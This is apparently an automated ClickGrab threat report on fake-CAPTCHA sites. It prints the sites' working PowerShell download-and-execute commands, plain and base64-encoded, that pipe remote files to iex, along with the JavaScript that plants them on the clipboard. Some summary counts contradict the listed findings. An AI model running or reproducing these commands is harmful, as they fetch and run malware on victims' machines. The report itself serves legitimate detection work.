Threat Intelligence Report

📅 June 20, 2025 🕒 Generated: 2025-06-20 02:37:24 🔍 Sites Analyzed: 90
🌐
90
Total Sites Analyzed
⚠️
10
Malicious Sites
11.0% detection rate
💻
31
PowerShell Commands
📋
2
Clipboard Hijacks
📊
31
Avg Threat Score

Attack Pattern Analysis

17
High Risk Commands
14
Base64 Encoded
9
Obfuscated JS
0
JS Redirects

Malicious Sites Detected

Click on a site to view detailed analysis
https://viriffic-processing.com/
25 indicators detected
Score: 280 PowerShell
4
powershell
1
obfuscation
1
base64
2
high risk commands

💻 PowerShell Commands 4

documentElement.innerHTML
powershell -E JABjAD0AJwBoAHQAJwArACcAdABwACcAOwAoAC4AJwBcAFcAKgBcACoAMwAyAFwAYwA/AD8AbAAuAGUAKgAnACAAIgAkAHsAYwB9ADoALwAvADkAMQAuADIAMQAyAC4AMQA2ADYALgAyADAANAAvADgANwA2ADUANAAzADIAMwAuAHQAeAB0ACIAKQB8AGkAZQB4AA==");
cmd /c start /min powershell -E JABjAD0AJwBoAHQAJwArACcAdABwACcAOwAoAC4AJwBcAFcAKgBcACoAMwAyAFwAYwA/AD8AbAAuAGUAKgAnACAAIgAkAHsAYwB9ADoALwAvADkAMQAuADIAMQAyAC4AMQA2ADYALgAyADAANAAvADgANwA2ADUANAAzADIAMwAuAHQAeAB0ACIAKQB8AGkAZQB4AA==");
powershell -E

🔐 Obfuscated JavaScript

{'script': '\r\nif (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini|Mobile|Tablet/i.test(navigator.userAgent) || window.innerWidth < 768) {\r\nwindow.s...', 'indicators': [{'pattern': 'var\\s+_0x[a-f0-9]{4,6}\\s*=', 'examples': ['var _0x1BA5=', 'var _0x43F0='], 'count': 3}, {'pattern': '_0x[a-f0-9]{4,6}\\[.*?\\]', 'examples': ['_0x1BA5[_idx]'], 'count': 1}, {'pattern': 'var\\s+_0x[a-f0-9]{2,8}\\s*=', 'examples': ['var _0x1BA5=', 'var _0x43F0='], 'count': 3}, {'pattern': '["\\\']((?:[A-Za-z0-9+/]{4}){20,}(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=))["\\\']', 'examples': ['"Nm9HR1NnMGJKeFVCVE05VlVpNkE5R0FpcGRrTWJKYlVxQ3FoW...'], 'count': 1}], 'score': 8, 'position': 100}
https://www.payment-verify.com/
25 indicators detected
Score: 280 PowerShell
4
powershell
1
obfuscation
1
base64
2
high risk commands

💻 PowerShell Commands 4

documentElement.innerHTML
powershell -E JABjAD0AJwBoAHQAJwArACcAdABwACcAOwAoAC4AJwBcAFcAKgBcACoAMwAyAFwAYwA/AD8AbAAuAGUAKgAnACAAIgAkAHsAYwB9ADoALwAvADkAMQAuADIAMQAyAC4AMQA2ADYALgAyADAANAAvADgANwA2ADUANAAzADIAMwAuAHQAeAB0ACIAKQB8AGkAZQB4AA==");
cmd /c start /min powershell -E JABjAD0AJwBoAHQAJwArACcAdABwACcAOwAoAC4AJwBcAFcAKgBcACoAMwAyAFwAYwA/AD8AbAAuAGUAKgAnACAAIgAkAHsAYwB9ADoALwAvADkAMQAuADIAMQAyAC4AMQA2ADYALgAyADAANAAvADgANwA2ADUANAAzADIAMwAuAHQAeAB0ACIAKQB8AGkAZQB4AA==");
powershell -E

🔐 Obfuscated JavaScript

{'script': '\r\nif (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini|Mobile|Tablet/i.test(navigator.userAgent) || window.innerWidth < 768) {\r\nwindow.s...', 'indicators': [{'pattern': 'var\\s+_0x[a-f0-9]{4,6}\\s*=', 'examples': ['var _0x1BA5=', 'var _0x43F0='], 'count': 3}, {'pattern': '_0x[a-f0-9]{4,6}\\[.*?\\]', 'examples': ['_0x1BA5[_idx]'], 'count': 1}, {'pattern': 'var\\s+_0x[a-f0-9]{2,8}\\s*=', 'examples': ['var _0x1BA5=', 'var _0x43F0='], 'count': 3}, {'pattern': '["\\\']((?:[A-Za-z0-9+/]{4}){20,}(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=))["\\\']', 'examples': ['"Nm9HR1NnMGJKeFVCVE05VlVpNkE5R0FpcGRrTWJKYlVxQ3FoW...'], 'count': 1}], 'score': 8, 'position': 100}
https://verlfication-process.com/
25 indicators detected
Score: 280 PowerShell
4
powershell
1
obfuscation
1
base64
2
high risk commands

💻 PowerShell Commands 4

documentElement.innerHTML
powershell -E JABjAD0AJwBoAHQAJwArACcAdABwACcAOwAoAC4AJwBcAFcAKgBcACoAMwAyAFwAYwA/AD8AbAAuAGUAKgAnACAAIgAkAHsAYwB9ADoALwAvADkAMQAuADIAMQAyAC4AMQA2ADYALgAyADAANAAvADgANwA2ADUANAAzADIAMwAuAHQAeAB0ACIAKQB8AGkAZQB4AA==");
cmd /c start /min powershell -E JABjAD0AJwBoAHQAJwArACcAdABwACcAOwAoAC4AJwBcAFcAKgBcACoAMwAyAFwAYwA/AD8AbAAuAGUAKgAnACAAIgAkAHsAYwB9ADoALwAvADkAMQAuADIAMQAyAC4AMQA2ADYALgAyADAANAAvADgANwA2ADUANAAzADIAMwAuAHQAeAB0ACIAKQB8AGkAZQB4AA==");
powershell -E

🔐 Obfuscated JavaScript

{'script': '\r\nif (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini|Mobile|Tablet/i.test(navigator.userAgent) || window.innerWidth < 768) {\r\nwindow.s...', 'indicators': [{'pattern': 'var\\s+_0x[a-f0-9]{4,6}\\s*=', 'examples': ['var _0x1BA5=', 'var _0x43F0='], 'count': 3}, {'pattern': '_0x[a-f0-9]{4,6}\\[.*?\\]', 'examples': ['_0x1BA5[_idx]'], 'count': 1}, {'pattern': 'var\\s+_0x[a-f0-9]{2,8}\\s*=', 'examples': ['var _0x1BA5=', 'var _0x43F0='], 'count': 3}, {'pattern': '["\\\']((?:[A-Za-z0-9+/]{4}){20,}(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=))["\\\']', 'examples': ['"Nm9HR1NnMGJKeFVCVE05VlVpNkE5R0FpcGRrTWJKYlVxQ3FoW...'], 'count': 1}], 'score': 8, 'position': 100}
https://verific-processing.com/
25 indicators detected
Score: 280 PowerShell
4
powershell
1
obfuscation
1
base64
2
high risk commands

💻 PowerShell Commands 4

documentElement.innerHTML
powershell -E JABjAD0AJwBoAHQAJwArACcAdABwACcAOwAoAC4AJwBcAFcAKgBcACoAMwAyAFwAYwA/AD8AbAAuAGUAKgAnACAAIgAkAHsAYwB9ADoALwAvADkAMQAuADIAMQAyAC4AMQA2ADYALgAyADAANAAvADgANwA2ADUANAAzADIAMwAuAHQAeAB0ACIAKQB8AGkAZQB4AA==");
cmd /c start /min powershell -E JABjAD0AJwBoAHQAJwArACcAdABwACcAOwAoAC4AJwBcAFcAKgBcACoAMwAyAFwAYwA/AD8AbAAuAGUAKgAnACAAIgAkAHsAYwB9ADoALwAvADkAMQAuADIAMQAyAC4AMQA2ADYALgAyADAANAAvADgANwA2ADUANAAzADIAMwAuAHQAeAB0ACIAKQB8AGkAZQB4AA==");
powershell -E

🔐 Obfuscated JavaScript

{'script': '\r\nif (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini|Mobile|Tablet/i.test(navigator.userAgent) || window.innerWidth < 768) {\r\nwindow.s...', 'indicators': [{'pattern': 'var\\s+_0x[a-f0-9]{4,6}\\s*=', 'examples': ['var _0x1BA5=', 'var _0x43F0='], 'count': 3}, {'pattern': '_0x[a-f0-9]{4,6}\\[.*?\\]', 'examples': ['_0x1BA5[_idx]'], 'count': 1}, {'pattern': 'var\\s+_0x[a-f0-9]{2,8}\\s*=', 'examples': ['var _0x1BA5=', 'var _0x43F0='], 'count': 3}, {'pattern': '["\\\']((?:[A-Za-z0-9+/]{4}){20,}(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=))["\\\']', 'examples': ['"Nm9HR1NnMGJKeFVCVE05VlVpNkE5R0FpcGRrTWJKYlVxQ3FoW...'], 'count': 1}], 'score': 8, 'position': 100}
http://91.212.166.205/
25 indicators detected
Score: 280 PowerShell
4
powershell
1
obfuscation
1
base64
2
high risk commands

💻 PowerShell Commands 4

documentElement.innerHTML
powershell -E JABjAD0AJwBoAHQAJwArACcAdABwACcAOwAoAC4AJwBcAFcAKgBcACoAMwAyAFwAYwA/AD8AbAAuAGUAKgAnACAAIgAkAHsAYwB9ADoALwAvADkAMQAuADIAMQAyAC4AMQA2ADYALgAyADAANAAvADgANwA2ADUANAAzADIAMwAuAHQAeAB0ACIAKQB8AGkAZQB4AA==");
cmd /c start /min powershell -E JABjAD0AJwBoAHQAJwArACcAdABwACcAOwAoAC4AJwBcAFcAKgBcACoAMwAyAFwAYwA/AD8AbAAuAGUAKgAnACAAIgAkAHsAYwB9ADoALwAvADkAMQAuADIAMQAyAC4AMQA2ADYALgAyADAANAAvADgANwA2ADUANAAzADIAMwAuAHQAeAB0ACIAKQB8AGkAZQB4AA==");
powershell -E

🔐 Obfuscated JavaScript

{'script': '\r\nif (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini|Mobile|Tablet/i.test(navigator.userAgent) || window.innerWidth < 768) {\r\nwindow.s...', 'indicators': [{'pattern': 'var\\s+_0x[a-f0-9]{4,6}\\s*=', 'examples': ['var _0x1BA5=', 'var _0x43F0='], 'count': 3}, {'pattern': '_0x[a-f0-9]{4,6}\\[.*?\\]', 'examples': ['_0x1BA5[_idx]'], 'count': 1}, {'pattern': 'var\\s+_0x[a-f0-9]{2,8}\\s*=', 'examples': ['var _0x1BA5=', 'var _0x43F0='], 'count': 3}, {'pattern': '["\\\']((?:[A-Za-z0-9+/]{4}){20,}(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=))["\\\']', 'examples': ['"Nm9HR1NnMGJKeFVCVE05VlVpNkE5R0FpcGRrTWJKYlVxQ3FoW...'], 'count': 1}], 'score': 8, 'position': 100}
https://91.212.166.205/
25 indicators detected
Score: 280 PowerShell
4
powershell
1
obfuscation
1
base64
2
high risk commands

💻 PowerShell Commands 4

documentElement.innerHTML
powershell -E JABjAD0AJwBoAHQAJwArACcAdABwACcAOwAoAC4AJwBcAFcAKgBcACoAMwAyAFwAYwA/AD8AbAAuAGUAKgAnACAAIgAkAHsAYwB9ADoALwAvADkAMQAuADIAMQAyAC4AMQA2ADYALgAyADAANAAvADgANwA2ADUANAAzADIAMwAuAHQAeAB0ACIAKQB8AGkAZQB4AA==");
cmd /c start /min powershell -E JABjAD0AJwBoAHQAJwArACcAdABwACcAOwAoAC4AJwBcAFcAKgBcACoAMwAyAFwAYwA/AD8AbAAuAGUAKgAnACAAIgAkAHsAYwB9ADoALwAvADkAMQAuADIAMQAyAC4AMQA2ADYALgAyADAANAAvADgANwA2ADUANAAzADIAMwAuAHQAeAB0ACIAKQB8AGkAZQB4AA==");
powershell -E

🔐 Obfuscated JavaScript

{'script': '\r\nif (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini|Mobile|Tablet/i.test(navigator.userAgent) || window.innerWidth < 768) {\r\nwindow.s...', 'indicators': [{'pattern': 'var\\s+_0x[a-f0-9]{4,6}\\s*=', 'examples': ['var _0x1BA5=', 'var _0x43F0='], 'count': 3}, {'pattern': '_0x[a-f0-9]{4,6}\\[.*?\\]', 'examples': ['_0x1BA5[_idx]'], 'count': 1}, {'pattern': 'var\\s+_0x[a-f0-9]{2,8}\\s*=', 'examples': ['var _0x1BA5=', 'var _0x43F0='], 'count': 3}, {'pattern': '["\\\']((?:[A-Za-z0-9+/]{4}){20,}(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=))["\\\']', 'examples': ['"Nm9HR1NnMGJKeFVCVE05VlVpNkE5R0FpcGRrTWJKYlVxQ3FoW...'], 'count': 1}], 'score': 8, 'position': 100}
https://proccess-verify.com/
21 indicators detected
Score: 230 PowerShell
2
powershell
1
obfuscation
1
base64
1
high risk commands

💻 PowerShell Commands 2

documentElement.innerHTML
powershell powershell.exe -w minimized powershell -C {& (dir \\W*\\*32\\c??l.e*).Name 'http://91.212.166.204/7564243512.txt' | iex}");

🔐 Obfuscated JavaScript

{'script': '\r\nif (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini|Mobile|Tablet/i.test(navigator.userAgent) || window.innerWidth < 768) {\r\nwindow.s...', 'indicators': [{'pattern': 'var\\s+_0x[a-f0-9]{4,6}\\s*=', 'examples': ['var _0x1B70=', 'var _0xC4EB='], 'count': 3}, {'pattern': '_0x[a-f0-9]{4,6}\\[.*?\\]', 'examples': ['_0x1B70[_idx]'], 'count': 1}, {'pattern': 'var\\s+_0x[a-f0-9]{2,8}\\s*=', 'examples': ['var _0x1B70=', 'var _0xC4EB='], 'count': 3}, {'pattern': '["\\\']((?:[A-Za-z0-9+/]{4}){20,}(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=))["\\\']', 'examples': ['"MU1xRkU5MGtDazVYL3daM3VnaWNUV1BhMGM1aFFCQVZ0V2d3d...'], 'count': 1}], 'score': 8, 'position': 100}
https://91.212.166.204/
21 indicators detected
Score: 230 PowerShell
2
powershell
1
obfuscation
1
base64
1
high risk commands

💻 PowerShell Commands 2

documentElement.innerHTML
powershell powershell.exe -w minimized powershell -C {& (dir \\W*\\*32\\c??l.e*).Name 'http://91.212.166.204/7564243512.txt' | iex}");

🔐 Obfuscated JavaScript

{'script': '\r\nif (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini|Mobile|Tablet/i.test(navigator.userAgent) || window.innerWidth < 768) {\r\nwindow.s...', 'indicators': [{'pattern': 'var\\s+_0x[a-f0-9]{4,6}\\s*=', 'examples': ['var _0x1B70=', 'var _0xC4EB='], 'count': 3}, {'pattern': '_0x[a-f0-9]{4,6}\\[.*?\\]', 'examples': ['_0x1B70[_idx]'], 'count': 1}, {'pattern': 'var\\s+_0x[a-f0-9]{2,8}\\s*=', 'examples': ['var _0x1B70=', 'var _0xC4EB='], 'count': 3}, {'pattern': '["\\\']((?:[A-Za-z0-9+/]{4}){20,}(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=))["\\\']', 'examples': ['"MU1xRkU5MGtDazVYL3daM3VnaWNUV1BhMGM1aFFCQVZ0V2d3d...'], 'count': 1}], 'score': 8, 'position': 100}
http://91.212.166.204/
21 indicators detected
Score: 230 PowerShell
2
powershell
1
obfuscation
1
base64
1
high risk commands

💻 PowerShell Commands 2

documentElement.innerHTML
powershell powershell.exe -w minimized powershell -C {& (dir \\W*\\*32\\c??l.e*).Name 'http://91.212.166.204/7564243512.txt' | iex}");

🔐 Obfuscated JavaScript

{'script': '\r\nif (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini|Mobile|Tablet/i.test(navigator.userAgent) || window.innerWidth < 768) {\r\nwindow.s...', 'indicators': [{'pattern': 'var\\s+_0x[a-f0-9]{4,6}\\s*=', 'examples': ['var _0x1B70=', 'var _0xC4EB='], 'count': 3}, {'pattern': '_0x[a-f0-9]{4,6}\\[.*?\\]', 'examples': ['_0x1B70[_idx]'], 'count': 1}, {'pattern': 'var\\s+_0x[a-f0-9]{2,8}\\s*=', 'examples': ['var _0x1B70=', 'var _0xC4EB='], 'count': 3}, {'pattern': '["\\\']((?:[A-Za-z0-9+/]{4}){20,}(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=))["\\\']', 'examples': ['"MU1xRkU5MGtDazVYL3daM3VnaWNUV1BhMGM1aFFCQVZ0V2d3d...'], 'count': 1}], 'score': 8, 'position': 100}
http://185.196.8.60/
31 indicators detected
Score: 216 PowerShell Clipboard Hijacking
1
powershell
2
clipboard
3
captcha
5
base64
2
high risk commands

💻 PowerShell Commands 1

powershell -w h powershell 'cu%%%r%l% %%http%%://safty%%%pl%%a%ce%.%c%%om/1%%5151%%%%.t%%%%x%%%t%%% |%%% %%%%iex%'.replace('%','')# Verification ID: 5932");

🔍 Suspicious Keywords 12

Verification ID
captcha-container
captcha-iogo
CAPTCHA
Captcha
CaptchaListeners
CaptchaCheckbox
CaptchaLoading
robot
Verification

📋 Clipboard Manipulation Code

...= ""; } function copyToClipboard() { navigator.clipboard.writeText ("powershell -w h powershell 'cu%%%r%l% %%http%%://...
...tener("click", function(event) { event.preventDefault(); verifyBtn.disabled = true; verifyCaptcha(); }); checkboxBtn.addEventListener("click", function(event) { event.preventDefault(); checkboxBtn.disabled = true; runClickedCheckboxEffects(); }); } } addCaptchaListeners(); function runClickedCheckboxEffects() { hideCaptchaCheckbox(); setTimeout(function() { showCaptchaLoading(); }, 500) setTimeout(function() { showVerifyWindow(); }, 900) } function showCaptchaCheckbox() { checkboxBtn.style...

Technical Analysis

ClickGrab Threat Analysis Report - 2025-06-20

Generated on 2025-06-20 02:37:24

Executive Summary

  • Total sites analyzed: 90
  • Sites with malicious content: 10
  • Unique domains encountered: 0
  • Total URLs extracted: 0
  • PowerShell download attempts: 0
  • Clipboard manipulation instances: 2

Domain Analysis

Most Frequently Encountered Domains

URL Pattern Analysis

Suspicious Keyword Analysis

Total Keywords Found: 92 (13 unique)

Keyword Categories

Social Engineering

10 unique keywords

  • robot
  • Captcha
  • Verification ID
  • captcha-iogo
  • Verification
  • CaptchaLoading
  • CAPTCHA
  • CaptchaCheckbox
  • CaptchaListeners
  • captcha-container

Verification Text

1 unique keywords

  • hidden

Technical Terms

2 unique keywords

  • iex
  • failed_to_retrieve

Most Frequent Keywords

  • failed_to_retrieve: 80 occurrences
  • Verification ID: 1 occurrences
  • captcha-container: 1 occurrences
  • captcha-iogo: 1 occurrences
  • CAPTCHA: 1 occurrences
  • Captcha: 1 occurrences
  • CaptchaListeners: 1 occurrences
  • CaptchaCheckbox: 1 occurrences
  • CaptchaLoading: 1 occurrences
  • robot: 1 occurrences
  • Verification: 1 occurrences
  • iex: 1 occurrences
  • hidden: 1 occurrences

Similar Keyword Patterns

Groups of keywords that appear to be variations of the same theme:

Group 1: Verification ID, Verification

Group 2: captcha-container, CaptchaLoading

Group 3: captcha-iogo, CAPTCHA, Captcha

JavaScript Obfuscation Analysis

Obfuscation Sophistication Score: 0/7

Potential Base64 Encoded Content

These strings may contain encoded malicious payloads:

  • iVBORw0KGgoAAAANSUhEUgAAAv4AAAMACAYAAABcimNkAAAABm...

Clipboard Manipulation Analysis

Detected clipboard manipulation in 2 instances.

Clipboard Attack Flow Analysis

Attack Sophistication: 2/7 components detected Total Technique Instances: 3

Attack Flow Components

The following components show how the clipboard attack is executed:

Clipboard Operations

Executing clipboard copy operations

Instances: 2 Examples: navigator.clipboard

Event Handling

Handling user interactions

Instances: 1 Examples: addEventListener

Malicious Payload Construction

How the final clipboard payload is assembled:

Verification Text

Instances: 1 Examples: - ""; } function copyToClipboard() { navigator.clipboard.writeText ("powershell -w h powershell 'cu%%%r%l% %%http%%://... ...tener("click", function(event) { event.preventDefault(); verifyBtn.disabled = true; verifyCaptcha(); }); checkboxBtn.addEventListener("click", function(event) { event.preventDefault(); checkboxBtn.disabled = true; runClickedCheckboxEffects(); }); } } addCaptchaListeners(); function runClickedCheckboxEffects() { hideCaptchaCheckbox(); setTimeout(function() { showCaptchaLoading(); }, 500) setTimeout(function() { showVerifyWindow(); }, 900) } function showCaptchaCheckbox() { checkboxBtn.style.width = "100%"; checkboxBtn.style.height = "100%"; checkboxBtn.style.borderRadius = "2px"; checkboxBtn.style.margin = "21px 0 0 12px"; checkboxBtn.style.opacity = "1"; } function hideCaptchaCheckbox() { checkboxBtn.style.width = "4px"; checkboxBtn.style.height = "4px"; checkboxBtn.style.borderRadius = "50%"; checkboxBtn.style.marginLeft = "25px"; checkboxBtn.style.marginTop = "33px"; checkboxBtn.style.opacity = "0"; } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.visibility = "hidden"; checkboxBtnSpinner.style.opacity = "0"; } function showVerifyWindow() { verifyWindow.style.display = "block"; verifyWindow.style.visibility = "visible"; verifyWindow.style.opacity = "1"; verifyWindow.style.top = checkboxWindow.offsetTop - 80 + "px"; verifyWindow.style.left = checkboxWindow.offsetLeft + 54 + "px"; if (verifyWindow.offsetTop < 5) { verifyWindow.style.top = "5px"; } if (verifyWindow.offsetLeft + verifyWindow.offsetWidth > window.innerWidth - 10) { verifyWindow.style.left = checkboxWindow.offsetLeft - 8 + "px"; } else { verifyWindowArrow.style.top = checkboxWindow.offsetTop + 24 + "px"; verifyWindowArrow.style.left = checkboxWindow.offsetLeft + 45 + "px"; verifyWindowArrow.style.visibility = "visible"; verifyWindowArrow.style.opacity = "1"; } } function closeVerifyWindow() { verifyWindow.style.display = "none"; verifyWindow.style.visibility = "hidden"; verifyWindow.style.opacity = "0"; verifyWindowArrow.style.visibility = "hidden"; verifyWindowArrow.style.opacity = "0"; showCaptchaCheckbox(); hideCaptchaLoading(); checkboxBtn.disabled = false; verifyBtn.disabled = false; } function isVerifyWindowVisible() { return verifyWindow.style.display !== "none" && verifyWindow.style.display !== ""; } function copyToClipboard() { navigator.clipboard.writeText... ...lt="" id="fkrc-spinner"> </div> <div id="fkrc-verifywin-window" class="fkrc-verifywin-window"> <div class="fkrc-verifywin-container"> <header class="fkrc-verifywin-header"> <span class="fkrc-verifywin-header-text-medium fkrc-m-p fkrc-block">To verify your request</span> <span class="fkrc-verifywin-header-text-big fkrc-m-p fkrc-block">follow the instructions below</span> </header> <main class="fkrc-verifywin-main"> <div class="chrome-box"> <div class="chrome-content"> <ul> <li>Press the Windows Button <img src='data:image/jpeg;base64,iVBORw0KGgoAAAANSUhEUgAAAv4AAAMACAYAAABcimNkAAAABmJLR0QA/wD/AP+gvaeTAAAdbUlEQVR4nO3dTZNc113H8Z+l0YMl68FUFrGsh5HGkiWPAwseigVLeDlU8Z6gWMCSLSuKJSyhWEGycRUrJ8GJnxMWPVMe99zp6R71Ped0/z+fqq5USlPXJyRovvff59ybAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAU9zDJnyZ5d46LvzPHRQEAgEkvJj7HSY6S3Dr5medJfr7tf/DBti8IAADFPUjysySf5Hzkv99rUcIfAAA2916Sj/PDxP5s5HeL+1WEPwAATLuT5E3Ob8v5JIPG/SrCHwCAyg6ymNwvb8s5TvJBx3VtnfAHAGDfXUtymOltOU+S3Oi2soaEPwAA++CdLJ6Gs7wl50WSx0lu9lvaGIQ/AAC75IMson7V4zCZIPwBABjN/SQvc35bzrBPzNkFwh8AgB7uJnmdHXoc5q4T/gAAzOXdTD8tZycfh7nrhD8AAG/jehaT+6m31D6N3hyG/yIAALiMx2HuAeEPAEBy/nGYZyP/w3hizs4T/gAAtfw0yac5vy3nKMnDjutiZsIfAGD/3EvyKh6HyRnCHwBgN519HOby3ntxzznCHwBgXLcz/ZZaj8NkY8IfAKCv60meZXpbjsdhsjX+hwQAML+zj8Nc3pbzOMnNbiujDOEPALA9y0/K8ThMhiH8AQA28yDJz3J+W47HYTI04Q8AcJ7HYbJ3hD8AUNWdJG/icZgUIfwBgH12kOTjnJ/aHyf5oOO6oDnhDwDsulWPw3yS5Ea/pcE4hD8AsAveSfI8HocJVyb8AYCRLD8O8zTyj+JxmPBWhD8A0NpFj8N0qBZmJPwBgDm8l8Wh2uVtOeIeOhH+AMBVLT8O82zki3sYjPAHAFbxOEzYE8IfALiW5DDT23I8DhP2hPAHgBo8DhOKE/4AsF8+yCLql7flvEhyu+O6gM6EPwDsnvtJXmb6TbUO1QKThD8AjOluktfxOExgS4Q/APTzbqafluNxmMDWCX8AmNf1LCb3U2+pfRq/i4FG/GUDAG/P4zCB4Ql/AFjP8uMwz0b+h0lu9VsawOWEPwD82E+TfJrz23KOkjzsuC6AtyL8AajoXpJX8ThMoBDhD8C+Ovs4zOW99+IeKEf4A7DLbmf6LbUehwmwRPgDMLrrSZ5leluOx2ECrMlflgCM4OzjMJe35TxOcrPbygD2hPAHoKXlJ+V4HCZAI8IfgG17kORnOb8tx+MwAToS/gBchcdhAuwY4Q/ARe4keROPwwTYC8IfoLaDJB/n/NT+OMkHHdcFwJYJf4D9t+pxmE+S3Oi3NABaEf4A++GdJM/jcZgAXED4A+yWR5nelnMUj8MEYAXhDzCe+0n+MOcD36FaAK5M+AP0836SP8/isZgvz3yeZrEvHwC2RvgD9POXSf6h9yIAqOFa7wUAAADzE/4AAFCA8AcAgAKEPwAAFOBwL7CPfpLFc+1fnPzr0Zl//zzJt/2WBgB9CH9gF91N8jrnn3HvLbUAcAHhD4zq/SzeSOslVgCwBcIf6OV6kmeZntqLewDYMuEPzMmWHAAYhPAH3pYtOQCwA4Q/cBlbcgBgDwh/ILElBwD2nvCHOh4m+TS25ABAScIf9octOet5p/cCAKAH4Q+7xZYcAOBKhD+Mx5YcAGDrhD+0Z0sOANCc8Id52JIDAAxF+MPV2ZIDAOwM4Q8Xu5bkMLbkAAB7QPhTnS05AEAJwp8KbMkBAMoT/uwDW3LYhBd4AVCS8GdX2JIDAPAWhD8jeZjkKMlxzm/LMbUHAHgLwp+WbMkBAOhE+LNtd5K8iS05AABDEf5chS05AAA7RvgzxZYcAIA9I/zrsiUHAKAQ4b/fbMmB8zzHH4CShP9usyUHAIC1CP/x2ZIDAMBbE/5jsCUHAIBZCf82bMkBAKAr4b89tuQAADAs4b8ZW3IAANhJwv/HbMkBAGAvVQx/W3IAAChnX8PflhzgIl7gBUBJuxr+tuQAAMAGRg5/W3IAAGBLeof/6ZacFzm/LcfUHgAAtmTu8LclBwAABjBX+L9O8rdZTPPFPQAAdDZX+D9I8iczXRsAANjQtd4LAAAA5jdX+P9+pusCAABXYOIPVOMFXgCUJPwBAKAA4Q8AAAXY4w8AAAWY+AMAQAHCHwAACrDVBwAACjDxBwCAAoQ/UI3n+ANQkvAHAIAC7PEHAIACTPwBAKAA4Q8AAAXY6gMAAAWY+AMAQAHCHwAAChD+AABQgD3+QDVe4AVASSb+AABQgPAHAIACbPUBAIACTPwBAKAA4Q8AAAUIfwAAKMAefwAAKMDEHwAAChD+QDVe4AVASbb6AABAASb+AABQgPAHAIAChD8AABRgjz8AABRg4g8AAAUIfwAAKMBWH6Aaz/EHoCQTfwAAKED4AwBAAcIfAAAKsMcfAAAKMPEHAIAChD8AABRgqw8AABRg4g8AAAUIf6AaL/ACoCThDwAABdjjDwAABZj4AwBAAcIfAAAKEP4AAFCAPf4AAFCAiT8AABQg/IFqPMcfgJJs9QEAgAJM/AEAoADhDwAABQh/AAAowB5/AAAowMQfAAAKEP4AAFCArT4AAFCAiT9QjRd4AVCS8AcAgAKEPwAAFGCPPwAAFGDiDwAABQh/AAAowFYfAAAowMQfAAAKEP4AAFCA8Aeq8QIvAEqyxx8AAAow8QcAgAKEPwAAFGCrDwAAFGDiDwAABQh/AAAoQPgDAEAB9vgD1XiOPwAlmfgDAEABwh8AAAqw1QcAAAow8QcAgAKEPwAAFCD8AQCgAHv8AQCgABN/AAAoQPgD1XiBFwAl2eoDAAAFmPgDAEABwh8AAAoQ/gAAUIA9/gAAUICJPwAAFCD8AQCgAFt9AACgABN/oBov8AKgJOEPAAAFCH8AACjAHn8AACjAxB8AAAoQ/gAAUICtPgAAUICJPwAAFCD8gWo8xx+AkoQ/AAAUYI8/AAAUYOIPAAAFCH8AACjAVh8AACjAxB8AAAoQ/gAAUIDwBwCAAuzxB6rxAi8ASjLxBwCAAoQ/AAAUYKsPAAAUYOIPAAAFCH8AAChA+AMAQAH2+AMAQAEm/kA1nuMPQEnCHwAACrDVBwAACjDxBwCAAoQ/AAAUIPwBAKAAe/wBAKAAE38AAChA+AMAQAG2+gDVeIEXACWZ+AMAQAHCHwAAChD+AABQgD3+AABQgIk/AAAUIPwBAKAAW30AAKAAE38AAChA+APVeIEXACUJfwAAKMAefwAAKMDEHwAAChD+AABQgK0+AABQgIk/AAAUIPwBAKAA4Q9U4zn+AJRkjz8AABRg4g8AAAUIfwAAKED4AwBAAfb4AwBAASb+AABQgPAHAIACbPUBAIACTPyBarzAC4CShD8AABQg/AEAoAB7/AEAoAATfwAAKED4AwBAAbb6AABAASb+AABQgPAHAIAChD9QjRd4AVCSPf4AAFCAiT8AABQg/AEAoABbfQAAoAATfwAAKED4AwBAAcIfAAAKsMcfqMZz/AEoycQfAAAKEP4AAFCArT4AAFCAiT8AABQg/AEAoADhDwAABdjjDwAABZj4AwBAAcIfqMYLvAAoyVYfAAAowMQfAAAKEP4AAFCA8AcAgALs8QcAgAJM/AEAoADhDwAABdjqAwAABZj4A9V4gRcAJQl/AAAoQPgDAEABwh8AAAqYM/wd8AUAgEGY+AMAQAHCHwAACrDVBwAACjDxB6rxHH8AShL+AABQgPAHAIAC7PEHAIACTPwBAKAA4Q8AAAXY6gMAAAWY+AMAQAHCHwAAChD+QDVe4AVASfb4AwBAASb+AABQgPAHAIACbPUBAIACTPwBAKAA4Q8AAAUIfwAAKMAef6Aaz/EHoCQTfwAAKED4AwBAAbb6AABAASb+AABQgPAHAIAChD8AABRgjz8AABRg4g8AAAUIf6AaL/ACoCRbfQAAoAATfwAAKED4AwBAAcIfAAAKsMcfAAAKMPEHAIAChD8AABRgqw8AABRg4g9U4wVeAJQk/AEAoADhDwAABdjjDwAABRz0XgAAAMP6KsmXl/zM51u4xi+zemi8jWt8neS3Da7xqyS/e8tr/O8lf34lwh8Aavs2yRcr/nyd4LrsZ1xjzGtQzJzhb6sPwG74XRYTqlV2JWRcY/NrAEWY+AOj